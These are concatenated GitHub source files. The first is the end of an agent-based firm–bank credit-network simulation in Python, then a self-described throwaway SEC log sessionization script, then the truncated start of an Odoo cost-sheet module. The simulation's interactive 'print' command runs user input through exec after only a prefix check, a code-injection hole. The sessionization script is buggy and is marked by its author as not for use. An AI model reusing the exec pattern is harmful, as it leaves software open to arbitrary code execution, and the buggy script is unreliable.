mode\n self.growthEnabled = growth\n self.continueUntilTime = 0\n\n if seed == None:\n self.seed = np.random.randint(900000)\n else:\n self.seed = int(seed)\n\n np.random.seed(self.seed)\n\n self.firms = agents.Firms(self.numberOfFirms, self.alpha, self.varpf)\n self.banks = agents.Banks(self.numberOfBanks)\n self.economy = agents.Economy(self.time)\n\n # firms-banks credit matching adjacency matrix\n # firms borrow from 1 bank but banks have multiple clients\n self.link_fb = np.zeros((self.numberOfFirms, self.numberOfBanks))\n banksWithFirms = np.ceil(np.random.uniform(0, self.numberOfBanks-1, self.numberOfFirms))\n for i in range(self.numberOfFirms):\n self.link_fb[i][int(banksWithFirms[i])] = 1\n\n\n # contains banks that firms use as lookup for interestRates\n self.bankPools = np.zeros((self.numberOfFirms, self.chi))\n\n if not outputFolder:\n self.outputFolder = \"results/\" + str(self.seed) + \"/\"\n else:\n if os.path.lexists(outputFolder):\n raise ValueError(\"Output folder already exists\")\n self.outputFolder = outputFolder\n if self.outputFolder[-1] != \"/\" and os.name == \"posix\":\n self.outputFolder += \"/\"\n elif self.outputFolder[-1] != \"\\\\\" and os.name == \"nt\":\n self.outputFolder += \"\\\\\"\n\n\n # Output variables\n self.changeFB = np.array([0]*self.time, dtype=float) # monitors how many firms change bank\n self.firmOutputReport = np.array([0]*self.time, dtype=float)\n self.firmCapitalReport = np.array([0]*self.time, dtype=float)\n self.firmWealthReport = np.array([0]*self.time, dtype=float)\n self.firmDebtReport = np.array([0]*self.time, dtype=float)\n self.firmProfitReport = np.array([0]*self.time, dtype=float)\n self.firmAvgPrice = np.array([0]*self.time, dtype=float)\n self.firmDefaultReport = np.array([0]*self.time, dtype=float)\n\n # array to store price, wealth, capital,... from a single firm\n self.individualFirm = np.array([[0,0,0,0,0,0,0,0,0]], dtype=float)\n\n self.bankWealthReport = np.array([0]*self.time, dtype=float)\n self.bankDebtReport = np.array([0]*self.time, dtype=float)\n self.bankProfitReport = np.array([0]*self.time, dtype=float)\n self.bankDefaultReport = np.array([0]*self.time, dtype=float)\n\n def findBestBank(self, potentialPartners):\n bestInterest = np.inf\n best = np.nan\n for partner in potentialPartners:\n if self.banks.interestRate[int(partner)] < bestInterest:\n bestInterest = self.banks.interestRate[int(partner)]\n best = int(partner)\n\n return best\n\n # Find bank-firm links that form credit network\n def findMatchings(self, time):\n self.bankPools = np.ceil(np.random.uniform(0, self.numberOfBanks-1, \\\n self.chi*self.numberOfFirms).reshape(self.numberOfFirms, self.chi))\n for f in range(self.numberOfFirms):\n # select potential partners\n potentialPartners = self.bankPools[f]\n\n # select best bank out of potentia partners\n bestBankIndex = self.findBestBank(potentialPartners)\n newInterest = self.banks.interestRate[bestBankIndex]\n\n # pick up interest of old partner\n currentBank = np.nonzero(self.link_fb[f])[0]\n if not currentBank:\n oldInterest = np.inf\n else:\n oldInterest = self.banks.interestRate[currentBank[0]]\n\n # compare old bank with new\n if ( newInterest < oldInterest ):\n # log change in firm-bank relationship\n self.changeFB[time] = self.changeFB[time] + 1\n\n # update link\n self.link_fb[f] = 0\n self.link_fb[f][bestBankIndex] = 1\n\n self.changeFB[time] = self.changeFB[time] / self.numberOfFirms\n\n # find who is using bank i\n def findBankCustomers(self, i):\n return np.nonzero(self.link_fb.transpose()[i])[0]\n\n def calculateDeposits(self):\n bankIndex = 0\n for bank in range(self.numberOfBanks):\n # find who is using bank\n bankCustomers = self.findBankCustomers(bank)\n self.banks.deposit[bank] = np.sum(self.firms.debt[bankCustomers]) - self.banks.networth[bank]\n\n # bank has gone bankrupt\n if self.banks.deposit[bank] < 0:\n self.banks.deposit[bank] = 0\n\n # compute bad debt\n defaultedFirmsWithBank = np.where(self.firms.default == 1) and bankCustomers\n self.banks.badDebt[bank] = np.sum(self.firms.lgdf[defaultedFirmsWithBank] * \\\n self.firms.debt[defaultedFirmsWithBank])\n\n # compute bank profits\n nonDefaultedFirmsWithBank = np.where(self.firms.default == 0) and bankCustomers\n p = np.dot(self.firms.debt[nonDefaultedFirmsWithBank], self.firms.interestRate[nonDefaultedFirmsWithBank]) - \\\n self.rCB * self.banks.deposit[bank] - self.cB * \\\n self.banks.networth[bank] - self.banks.badDebt[bank]\n self.banks.profit[bank] = p\n bankIndex += 1\n\n def maxFirmWealth(self):\n return np.amax(self.firms.networth) \n\n # replace bankrupt banks and firms with new ones\n def replaceDefaults(self):\n maxFirmWealth = self.maxFirmWealth()\n defaulted = np.where(self.firms.default == 1)[0]\n if defaulted.size == 0:\n return\n\n # find new partners for defaulted firms\n banks = np.ceil(np.random.uniform(0, self.numberOfBanks-1, len(defaulted)))\n self.link_fb[defaulted] = 0\n j = 0\n for i in defaulted:\n self.link_fb[i][int(banks[j])] = 1\n j += 1\n\n # create new firms\n self.firms.networth[defaulted] = np.random.uniform(2, size=len(defaulted))\n self.firms.leverage[defaulted] = 1\n self.firms.price[defaulted] = np.random.normal(self.alpha, np.sqrt(self.varpf), size=len(defaulted))\n self.firms.interestRate[defaulted] = self.rCB + self.banks.interestRate[ \\\n np.nonzero(self.link_fb[defaulted])[1]] + self.gamma * \\\n (self.firms.leverage[defaulted] / ((1+self.firms.networth[defaulted] / maxFirmWealth)))\n self.firms.default[defaulted] = 0\n\n # replace defaulted banks\n defaulted = np.where(self.banks.default == 1)\n self.banks.networth[defaulted] = np.random.uniform(2, size=len(defaulted))\n self.banks.default[defaulted] = 0\n\n if np.any(np.where(self.firms.default == 1)):\n raise Exception(\"Error: Defaulted firms not removed\")\n if np.any(self.firms.networth <= 0):\n raise Exception(\"Firm negative networth\", np.where(self.firms.networth <= 0))\n if np.any(self.banks.networth <= 0):\n raise Exception(\"Banks negative networth at \", np.where(self.banks.networth <= 0))\n if np.any(self.firms.capital < 0):\n raise Exception(\"Firms with negative total capital\", len(np.where(self.firms.capital <= 0)[0]))\n\n def updateInterestRates(self):\n self.banks.interestRate = self.gamma * np.float_power(self.banks.networth, -self.gamma)\n\n def updateFrimDebt(self):\n self.firms.debt = self.firms.leverage * self.firms.networth\n\n def updateFirmCapital(self):\n self.firms.capital = self.firms.networth + self.firms.debt\n\n def updateFirmOutput(self):\n self.firms.output = self.phi * np.float_power(self.firms.capital, self.beta)\n\n def updateFirmPrice(self):\n self.firms.price = np.random.normal(self.alpha, np.sqrt(self.varpf), size=self.numberOfFirms)\n\n def updateFirmInterestRate(self):\n bestFirmWorth = self.maxFirmWealth()\n banksOfFirms = np.nonzero(self.link_fb)[1]\n self.firms.interestRate = self.rCB + self.banks.interestRate[banksOfFirms] + \\\n self.gamma*(self.firms.leverage) / \\\n ((1+self.firms.networth/bestFirmWorth))\n \n def updateFirmProfit(self):\n self.firms.profit = self.firms.price * self.firms.output - self.firms.interestRate * self.firms.debt\n\n def updateFirmNetWorth(self):\n self.firms.networth += self.firms.profit\n # check if bankrupt\n self.firms.default[self.firms.networth > 0] = 0\n self.firms.default[self.firms.networth <= 0] = 1\n\n def updateBankNetWorth(self):\n self.banks.networth += self.banks.profit\n # check if bankrupt\n self.banks.default[self.banks.networth > 0] = 0\n self.banks.default[self.banks.networth <= 0] = 1\n\n def updateFirmLeverage(self):\n u = np.random.uniform(size=self.numberOfFirms)\n firmsPriceGreaterInterest = []\n firmsPriceLessInterest = []\n\n firmsPriceGreaterInterest = np.where(self.firms.price > self.firms.interestRate)\n firmsPriceLessInterest = np.where(self.firms.price <= self.firms.interestRate)\n\n self.firms.leverage[firmsPriceGreaterInterest] = \\\n self.firms.leverage[firmsPriceGreaterInterest] * \\\n (1+self.adj * u[firmsPriceGreaterInterest])\n\n self.firms.leverage[firmsPriceLessInterest] = \\\n self.firms.leverage[firmsPriceLessInterest] * \\\n (1-self.adj * u[firmsPriceLessInterest])\n\n def updateFirmDebt(self):\n self.firms.debt = self.firms.leverage * self.firms.networth\n\n def updateLossRatio(self):\n self.firms.lgdf = -self.firms.networth / self.firms.debt\n self.firms.lgdf[self.firms.lgdf > 1] = 1\n self.firms.lgdf[self.firms.lgdf < 0] = 0\n\n def addAgents(self, t):\n if t % 20 == 0:\n self.banks.addBank()\n self.numberOfBanks += 1\n\n self.firms.addFirm()\n self.numberOfFirms += 1\n\n banksWithNewFirm = np.ceil(np.random.uniform(0, self.numberOfBanks-1, self.numberOfFirms))\n self.link_fb = np.column_stack((self.link_fb, np.zeros(self.numberOfFirms-1)))\n\n self.link_fb = np.vstack((self.link_fb, np.zeros(self.numberOfBanks)))\n self.link_fb[-1][int(banksWithNewFirm[0])] = 1\n else:\n self.firms.addFirm()\n self.numberOfFirms += 1\n banksWithNewFirm = np.ceil(np.random.uniform(0, self.numberOfBanks-1, self.numberOfFirms))\n self.link_fb = np.vstack((self.link_fb, np.zeros(self.numberOfBanks)))\n self.link_fb[-1][int(banksWithNewFirm[0])] = 1\n \n\n def reportResults(self, time):\n totalCapital = np.sum(self.firms.capital)\n totalOutput = np.sum(self.firms.output)\n self.firmOutputReport[time] = totalOutput\n self.firmCapitalReport[time] = totalCapital\n self.firmAvgPrice[time] = np.mean(self.firms.price)\n self.firmWealthReport[time] = np.sum(self.firms.networth)\n self.firmDebtReport[time] = np.sum(self.firms.debt)\n self.firmProfitReport[time] = np.sum(self.firms.profit)\n self.firmDefaultReport[time] = np.count_nonzero(self.firms.default)\n\n # Gather the results of the last agent\n firmsResults = []\n for i in [self.firms.output, self.firms.capital, self.firms.price,\n self.firms.networth, self.firms.debt, self.firms.profit,\n self.firms.default, self.firms.interestRate, self.firms.leverage]:\n firmsResults.append(i[-1])\n self.individualFirm = np.concatenate((self.individualFirm, np.array([firmsResults])))\n\n # Gather aggregate bank results\n self.bankWealthReport[time] = np.sum(self.banks.networth)\n self.bankDebtReport[time] = np.sum(self.banks.badDebt)\n self.bankProfitReport[time] = np.sum(self.banks.profit)\n self.bankDefaultReport[time] = np.count_nonzero(self.banks.default)\n\n self.economy.GDP[time] = totalOutput\n self.economy.badDebtAsGDP[time] = np.mean(self.banks.badDebt*100 / totalOutput)\n self.economy.avgInterest[time] = np.mean(self.banks.interestRate)\n self.economy.leverage[time] = self.firmDebtReport[time] / self.firmWealthReport[time]\n\n def saveResults(self):\n\n try:\n os.mkdir(self.outputFolder)\n except FileExistsError:\n print(\"Simulation with this seed exists\")\n override = input(\"Overwrite results? [Y/n]: \")\n if \"N\" in override.upper() or (\"N\" in override.upper() and \"Y\" in override.upper()):\n exit()\n\n infoFile = open(self.outputFolder + \"INFO\", \"+w\")\n infoFile.write(\"### Simulation Configuration ###\\n\")\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Seed\", self.seed))\n date = time.strftime(\"%d %b %Y: %H:%M\", time.gmtime())\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Date ran\", date))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Total Steps\", self.time))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Number of Firms\", self.numberOfFirms))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Number of Banks\", self.numberOfBanks))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Price Mean (alpha)\", self.alpha))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Price Variance\", self.varpf))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Interest rate param (gamma)\", self.gamma))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Number of potential parters (chi)\", self.chi))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Intensity of choice (lambd)\", self.lambd))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Leverage adjustment (adj)\", self.adj))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Production function param (phi)\", self.phi))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Production function param (beta)\", self.beta))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\".format(\"Central bank interest rate (rCB)\", self.rCB))\n infoFile.write(\"\\t{0:35} = {1:5}\\n\\n\".format(\"Bank costs (cB)\", self.cB))\n\n infoFile.write(\"### Quick Analysis ###\\n\")\n infoFile.write(\"{0:20} = {1:5}\\n\".format(\"Mean leverage\", np.mean(self.economy.leverage[300:])))\n infoFile.write(\"{0:20} = {1:5}\\n\".format(\"Mean firm default\", np.mean(self.firmDefaultReport)))\n infoFile.write(\"{0:20} = {1:5}\\n\".format(\"Mean banks default\", np.mean(self.bankDefaultReport)))\n infoFile.write(\"{0:20} = {1:5}\\n\".format(\"Mean percentage GDP as non-performing loans\", \\\n np.mean(self.economy.badDebtAsGDP[300:])))\n\n # Report simulation fails\n if np.all(self.firms.price == 0):\n infoFile.write(\"Warning: Firm price error\\n\")\n if np.all(self.economy.leverage == 0):\n infoFile.write(\"Warning: Economy leverage error\\n\")\n if np.mean(self.economy.badDebtAsGDP[300:]) > 3:\n infoFile.write(\"Warning: High Bad Debt\\n\")\n\n infoFile.close()\n\n print(\"Writing simulation results with seed \" + str(self.seed))\n\n columnNames = [\"Firms Aggregate Output\", \"Firms Aggregate Capital\", \\\n \"AVG Firm Price\", \"Firms Aggregate Wealth\", \"Firms Aggregate Debt\", \\\n \"Firms Aggregate Profit\", \"Total defaulted firms\", \\\n \"Banks Aggregate Wealth\", \"Banks Aggregate Debt\", \\\n \"Banks Aggregate Profit\", \"Total defaulted banks\", \\\n \"Economy GDP\", \"Average interest rate\", \"Economy Debt-Equity Ratio\"]\n\n f = open(self.outputFolder + \"aggregateResults.csv\", \"w+\")\n\n for name in columnNames:\n f.write(name+\", \")\n f.write('\\n')\n\n output = np.stack((self.firmOutputReport,\n self.firmCapitalReport,\n self.firmAvgPrice,\n self.firmWealthReport,\n self.firmDebtReport,\n self.firmProfitReport,\n self.firmDefaultReport,\n self.bankWealthReport,\n self.bankDebtReport,\n self.bankProfitReport,\n self.bankDefaultReport,\n self.economy.GDP,\n self.economy.badDebtAsGDP,\n self.economy.avgInterest,\n self.economy.leverage))\n np.savetxt(f, output.transpose(), delimiter=\",\")\n f.close()\n\n columnNames = [\"Firm Output\", \"Firm Capital\", \"Firm Price\", \\\n \"Firm Networth\", \"Firm Debt\", \"Firm Profit\", \\\n \"Defaulted\", \"Firm Interest Rate\", \"Firm Leverage\"]\n\n # Write results for special firm\n f = open(self.outputFolder + \"individualFirmResults.csv\", \"w+\")\n for name in columnNames:\n f.write(name+\", \")\n f.write('\\n')\n self.individualFirm = self.individualFirm[1:] # remove first row which is just zeros\n np.savetxt(f, self.individualFirm, delimiter=\",\")\n f.close()\n\n def interactiveShell(self):\n\n def continueCmd(self, args):\n if (not args) or (args[0] == \"\"):\n self.continueUntilTime = self.currentStep + 1\n else:\n self.continueUntilTime = int(args[0])\n if self.continueUntilTime <= self.currentStep:\n raise ValueError\n print(\"Continuing until time \", self.continueUntilTime)\n\n def help():\n print(\"List of commands:\\n\")\n print(\"{0:20} -- {1}\".format(\"continue\",\"Step simulation forward\"))\n print(\"{0:20} -- {1}\".format(\"continue [step]\",\"Step simulation forward to particular step\"))\n print(\"{0:20} -- {1}\".format(\"exit/quit\",\"Quit simulation\"))\n print(\"{0:20} -- {1}\".format(\"help\",\"Show this list of commands\"))\n print(\"{0:20} -- {1}\".format(\"list\",\"List variables of simulation\"))\n print(\"{0:20} -- {1}\".format(\"print\", \"Print simulation variable\"))\n\n def listVariables(self):\n print(\"\\nVariables: {0:5}, {1:5}\\n\".format(\"firms\", \"banks\"))\n print(\"Firms attributes:\")\n print(\"\\t{0:20} {1:20} {2:20}\".format(\"numberOfFirms\", \"price\", \"debt\"))\n print(\"\\t{0:20} {1:20} {2:20}\".format(\"networth\", \"profit\", \"interestRate\"))\n print(\"\\t{0:20} {1:20} {2:20}\".format(\"leverage\", \"capital\", \"output\"))\n print(\"\\t{0:20} {1:20}\".format(\"lgdf\", \"default\", \"debt\"))\n print(\"\\n\")\n print(\"Banks attributes:\")\n print(\"\\t{0:20} {1:20} {2:20}\".format(\"numberOfFirms\", \"price\", \"badDebt\"))\n print(\"\\t{0:20} {1:20} {2:20}\".format(\"networth\", \"profit\", \"interestRate\"))\n print(\"\\t{0:20} {1:20} {2:20}\".format(\"deposit\", \"creditLinkDegree\", \"nonPerformingLoans\"))\n print(\"\\t{0:20}\".format(\"default\"))\n\n def printVar(self, args):\n try:\n if (not args[0].startswith(\"firms.\")) and (not args[0].startswith(\"banks.\"))\\\n and (not args[0].startswith(\"economy.\")):\n raise ValueError\n exec(\"print(self.\" + args[0] + \")\")\n except (ValueError, IndexError):\n print(\"Invalid use of command: print\")\n print(\"Usage:\")\n print(\"\\tprint [variable].[attribute]\")\n print(\"Use command list to see valid variables and attributes\")\n print(\"\")\n print(\"Examples:\")\n print(\"\\tprint firms.price\")\n print(\"\")\n print(\"\\tprint firms.networth[3]\")\n except SyntaxError:\n print(\"Invalid use of command: print\")\n print(str(args[0][:6]) + \" has no attribute \" + \\\n str(args[0][6:]))\n\n while(True):\n try:\n shellCommand = str(input(\">>> \"))\n originalCommand = shellCommand\n shellCommand = shellCommand.split(\" \")\n cmd = shellCommand[0]\n args = shellCommand[1:]\n if (\"exit\" == cmd) or (\"quit\" == cmd):\n print(\"Do you wish to save results?\")\n answer = input(\"[Y/N] \").lower()\n if (\"y\" == answer) or (\"yes\" == answer):\n self.saveResults()\n sys.exit()\n elif (\"continue\" == cmd) or (\"c\" == cmd):\n try:\n continueCmd(self, args)\n except (ValueError, IndexError):\n print(\"Invalid use of command: continue\")\n print(\"\\tUsage: continue [time to continue to]\")\n continue\n break\n elif (\"help\" == cmd) or (\"h\" == cmd):\n help()\n elif (\"list\" == cmd) or (\"l\" == cmd):\n listVariables(self)\n elif (\"print\" == cmd) or (\"p\" == cmd):\n printVar(self, args)\n except EOFError:\n print(\"Exiting simulation, results will not be saved\")\n sys.exit()\n except AttributeError as e:\n print(e)\n\n def run(self):\n print(\"Running Simulation...\")\n for t in range(self.time):\n self.currentStep = t\n\n # update banks interest rates\n self.updateInterestRates()\n\n # find bank-firm matchings\n self.findMatchings(t)\n\n # firms update leverage target\n self.updateFirmLeverage()\n\n # determine demand for loans\n self.updateFirmDebt()\n\n # compute total financial capital\n self.updateFirmCapital()\n\n # compute output\n self.updateFirmOutput()\n\n # update price\n self.updateFirmPrice()\n\n # compute interest rate charged to firms\n self.updateFirmInterestRate()\n\n # compute firms profit\n self.updateFirmProfit()\n\n # update firms net worth and check wether defaulted\n self.updateFirmNetWorth()\n\n # compute loss given default ratio\n self.updateLossRatio()\n\n # compute deposits\n self.calculateDeposits()\n\n # update banks net worth and check if defaulted\n self.updateBankNetWorth()\n\n self.reportResults(t)\n\n if (self.mode == \"Interactive\") and \\\n (self.continueUntilTime == self.currentStep):\n print(\"Time: \", t)\n self.interactiveShell()\n\n # replace defaulted firms and banks\n try:\n self.replaceDefaults()\n except Exception as e:\n print(\"Problem with replacing defaulted firms\")\n print(e)\n\n if self.growthEnabled:\n self.addAgents(t)\n\n self.saveResults()\n\n","repo_name":"pnfox/COMP3931-model","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":24574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43471103379","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nDON'T USE THIS ONE - PLEASE USE \"sessionization.py\"\nTHIS SCRIPT IS MEANT FOR TESTING OUT IDEAS ONLY (please ignore it)\n\nSolving the Insight DataEngineering challenge \nSEC logfile sessionization\n\n\n@author: TN\n\"\"\"\n\n'=============== Import packages ============='\nimport numpy as np\nimport csv \nimport pandas as pd\nimport time, timeit\nimport datetime\nimport sys\n\n'=============== Set directory and filename =============='\n\ntopdir = 'C:\\\\Users\\\\ttngu207\\\\OneDrive\\\\Python Learning\\\\Edgar_Analytics\\\\edgar-analytics\\\\'\noutputfile_name = 'sessionization_v2.txt'\nSEClog_dir = 'D:\\\\Python Scripts\\\\EdgarAnalytics\\\\'\nSEC_logfile_name = 'SEC_log20170630.csv'\n\n#SEClog_dir = 'C:\\\\Users\\\\ttngu207\\\\OneDrive\\\\Python Learning\\\\Edgar_Analytics\\\\edgar-analytics\\\\insight_testsuite\\\\tests\\\\test_1\\\\input\\\\'\n#SEC_logfile_name = 'log.csv'\n\ninactivity_periodfile = topdir + 'input\\\\' + 'inactivity_period.txt'\n\n'=============== Do stuffs ================='\n\n'---- Set up some parameters ----'\n# Get the inactivity period\nf = open(inactivity_periodfile)\ninactivity_period = f.readline()\nf.close()\ninactivity_period = int(inactivity_period.split('\\n')[0])\n# Set date-time formatting (ideally grab from a config file)\nglobal __dateFormat__, __timeFormat__, __datetimeFormat__\n__dateFormat__ = '%Y-%m-%d'\n__timeFormat__ = '%H:%M:%S'\n__datetimeFormat__ = __dateFormat__ + ' ' + __timeFormat__\n\n# Some filtering param for the log file\ncolnameDict = {'ip':0, 'date':1, 'time':2, 'zone':3, 'cik':4, 'accession':5, 'extention':6, 'code':7,\n 'size':8, 'idx':9, 'norefer':10, 'noagent':11, 'find':12, 'crawler':13, 'browser':14}\nitemOfInterest = [colnameDict['ip'],colnameDict['date'],colnameDict['time'],colnameDict['cik'],colnameDict['accession'] ]\n\n #%% \n'=============== Supporting functions ================='\ndef create_new_session(IPs, StartDateTime, numDocRequested, LastRequestTime, ip, current_datetime):\n new_IPs = np.append(IPs,ip)\n new_StartDateTime = np.append(StartDateTime,current_datetime)\n new_numDocRequested = np.append(numDocRequested,1)\n new_LastRequestTime = np.append(LastRequestTime,current_datetime)\n return new_IPs, new_StartDateTime, new_numDocRequested, new_LastRequestTime\n \ndef remove_expired_session(IPs, StartDateTime, numDocRequested, LastRequestTime, expiredSessionsMask):\n notExpiredMask = np.logical_not(expiredSessionsMask)\n new_IPs = IPs[notExpiredMask]\n new_StartDateTime = StartDateTime[notExpiredMask]\n new_numDocRequested = numDocRequested[notExpiredMask]\n new_LastRequestTime = LastRequestTime[notExpiredMask]\n return new_IPs, new_StartDateTime, new_numDocRequested, new_LastRequestTime\n\ndef generate_ending_report(ip, startDateTime, lastRequestTime, numDocRequested):\n sessionDuration = lastRequestTime - startDateTime + datetime.timedelta(seconds=1)\n endingReport = ip + ',' + \\\n startDateTime.strftime(__datetimeFormat__) + ',' + \\\n lastRequestTime.strftime(__datetimeFormat__) + ',' + \\\n str(sessionDuration.seconds) + ',' + \\\n str(numDocRequested)\n return endingReport \n\n\n#%%\n' ==================== The heavy lifting ===================='\nt_start = time.time()\nf_output = open(SEClog_dir+outputfile_name,'w')\nf_log = open(SEClog_dir+SEC_logfile_name)\ndataReader = csv.reader(f_log)\n\ncount = 0\nIPsize = []\n\n# Create some arrays\nIPs = np.ndarray(0,dtype=str)\nStartDateTime = np.ndarray(0,dtype=datetime.datetime)\nnumDocRequested = np.ndarray(0,dtype=int)\nLastRequestTime = np.ndarray(0,dtype=datetime.datetime)\n\nf_output.mode = 'a'\nfor dataLine in dataReader:\n if dataReader.line_num == 1: continue\n \n '====== Processing ======' \n ip = dataLine[colnameDict['ip']]\n accessDate = dataLine[colnameDict['date']]\n accessTime = dataLine[colnameDict['time']]\n current_datetime = accessDate + ' ' + accessTime\n \n current_datetime = datetime.datetime.strptime(current_datetime, __datetimeFormat__)\n\n '---- Very first line being stream?? ----'\n if IPs.size == 0:\n IPs, StartDateTime, numDocRequested, LastRequestTime = create_new_session(IPs, StartDateTime, numDocRequested, LastRequestTime, ip, current_datetime)\n continue\n \n '---- Check if this IP is new or part of the previously opened session ----'\n intersectMask = np.in1d( IPs, np.array(ip) )\n intersectIndex = np.arange(IPs.size)[intersectMask]\n \n '---- If existed, add a request to the corresponding session ----'\n if intersectIndex.size == 1:\n LastRequestTime[intersectIndex[0]] = current_datetime\n numDocRequested[intersectIndex[0]] = numDocRequested[intersectIndex[0]] + 1\n elif intersectIndex.size == 0: \n '---- If new, create a new session and add to sessions list ----'\n IPs, StartDateTime, numDocRequested, LastRequestTime = create_new_session(IPs, StartDateTime, numDocRequested, LastRequestTime, ip, current_datetime)\n\n '---- Check all currently opened sessions to see if any expire ----'\n expiredSessionsMask = np.zeros(IPs.size, dtype = bool)\n for sessIndex, sess_lastRequestTime in enumerate(LastRequestTime):\n elapsedTime = current_datetime - sess_lastRequestTime\n expirestatus = elapsedTime.seconds > inactivity_period\n expiredSessionsMask[sessIndex] = expirestatus\n '-- If expire, generate the session report --'\n if expirestatus:\n endingReport = generate_ending_report(IPs[sessIndex], StartDateTime[sessIndex], LastRequestTime[sessIndex], numDocRequested[sessIndex])\n #print(endingReport)\n f_output.write('%s\\n' % endingReport) \n \n '---- Remove expired sessions out of the list of current opened sessions ----'\n IPs, StartDateTime, numDocRequested, LastRequestTime = remove_expired_session(IPs, StartDateTime, numDocRequested, LastRequestTime, expiredSessionsMask)\n \n IPsize.append(get_size(IPs))\n '====== End processing ======'\n count = count+1 \n if count == 50000: break \n\n'====== End of stream, set all current sessions to expire ======'\nfor k in list(range(0,IPs.size)):\n endingReport = generate_ending_report(IPs[k], StartDateTime[k], LastRequestTime[k], numDocRequested[k])\n #print(endingReport)\n f_output.write('%s\\n' % endingReport) \n \ndel IPs, StartDateTime, numDocRequested, LastRequestTime \nf.close() \nt_end = time.time() \nprint('Run time: %f second' % (t_end - t_start))\n' ==================== Finished ===================='\n\n\n#%%\n'=============== R&D ================='\n\nCSVdata = pd.read_csv(SEClog_dir+SEC_logfile_name, nrows=2000)\nCSVdata = CSVdata[['ip','date','time','cik','accession']]\nCSVdata.tail()\n\nimport matplotlib.pyplot as plt\nplt.plot(IPsize)\n\ndef get_size(obj, seen=None):\n \"\"\"Recursively finds size of objects\"\"\"\n size = sys.getsizeof(obj)\n if seen is None:\n seen = set()\n obj_id = id(obj)\n if obj_id in seen:\n return 0\n # Important mark as seen *before* entering recursion to gracefully handle\n # self-referential objects\n seen.add(obj_id)\n if isinstance(obj, dict):\n size += sum([get_size(v, seen) for v in obj.values()])\n size += sum([get_size(k, seen) for k in obj.keys()])\n elif hasattr(obj, '__dict__'):\n size += get_size(obj.__dict__, seen)\n elif hasattr(obj, '__iter__') and not isinstance(obj, (str, bytes, bytearray)):\n size += sum([get_size(i, seen) for i in obj])\n return size\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ttngu207/EdgarAnalytics","sub_path":"src/sessionization_v2.py","file_name":"sessionization_v2.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11014959399","text":"from odoo.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT\r\nfrom datetime import datetime, date, timedelta\r\nimport json\r\nimport datetime\r\nimport pytz\r\nimport io\r\nfrom odoo import api, fields, models, _\r\nfrom odoo.exceptions import ValidationError, UserError\r\nfrom odoo.http import request\r\nfrom odoo.tools import date_utils\r\nimport pandas as pd\r\n\r\n\r\nclass MrpBom(models.Model):\r\n \r\n \r\n _inherit = 'mrp.bom'\r\n \r\n \r\n name = fields.Char('Bom Name', required=True, )\r\n \r\n\r\n _sql_constraints = [\r\n ('name_uniq', 'unique (name)', \"BOM name already exists !\"),\r\n ]\r\n \r\n def name_get(self):\r\n return [(bom.id, '%s%s' % (bom.code and '%s: ' % bom.code or '', bom.name)) for bom in self]\r\n\r\n\r\n\r\nclass MrpProduction(models.Model):\r\n \r\n \r\n _inherit = 'mrp.production' \r\n \r\n \r\n costsheet_id = fields.Many2one('cost.sheet.two', string = 'CostSheet',store =True)\r\n \r\n \r\n partner_id = fields.Many2one('res.partner', related ='costsheet_id.partner_id',string='Partner',store =True)\r\n \r\n \r\n @api.onchange('product_id')\r\n def onchange_costsheet(self):\r\n shs = []\r\n for rec in self:\r\n sheets = self.env['cost.sheet.two'].search([('product_id','=',rec.product_id.id),('status','=','active')])\r\n for sheet in sheets:\r\n shs.append(sheet.id)\r\n return {'domain': {\r\n 'costsheet_id': [('id', 'in', shs)]\r\n }}\r\n\r\n\r\n\r\nclass CostSheetTwo(models.Model):\r\n \r\n _name = 'cost.sheet.two'\r\n \r\n _description = 'Cost Sheet Two' \r\n\r\n company_id = fields.Many2one('res.company', string='Company', readonly=True, default=lambda self: self.env.company.id)\r\n \r\n status = fields.Selection([('active', 'Active'), ('expired', 'Expired')], 'Status', default='active')\r\n \r\n name = fields.Char(string =\"Name\",readonly=True,)\r\n \r\n costsheet_lines = fields.One2many('cost.sheet.line', 'cosheet_id', string=\"Product List\")\r\n \r\n partner_id = fields.Many2one('res.partner', string='Partner',require = True)\r\n \r\n avg_sale = fields.Boolean(string = \"Average Sales Price\",)\r\n \r\n product_id = fields.Many2one('product.product', string=\"Product\")\r\n\r\n product_uom_id = fields.Many2one('uom.uom', related='product_id.uom_id', string='Unit of Measure')\r\n \r\n bom_id = fields.Many2one('mrp.bom', string=\"BOM\")\r\n \r\n raw_ids = fields.Many2many('product.product', string=\"Raw Components\")\r\n \r\n material_cost = fields.Float(string ='Material Cost',)\r\n \r\n labcost = fields.Float(string ='Labour/Overhead' ,)\r\n \r\n total = fields.Float(string ='Total',compute='_compute_total',store = True)\r\n \r\n plb = fields.Float(string ='Product per LB', default = lambda self: self._onchange_default_plb())\r\n \r\n unitcost = fields.Float(string ='Unit Cost',compute='_compute_unit_cost',store =True)\r\n \r\n qty = fields.Integer(string ='Quantity', default = lambda self: self._onchange_default_qty())\r\n \r\n amount = fields.Float(string ='Amount', compute ='_compute_amount',store =True)\r\n \r\n bag = fields.Float(string ='Plastic Bag')\r\n \r\n label = fields.Float(string ='Label')\r\n \r\n other = fields.Float(string ='Others')\r\n \r\n meter = fields.Float(string ='Meter')\r\n \r\n metal = fields.Float(string ='Metal')\r\n \r\n box = fields.Float(string ='Box')\r\n \r\n diesel = fields.Float(string ='Diesel')\r\n 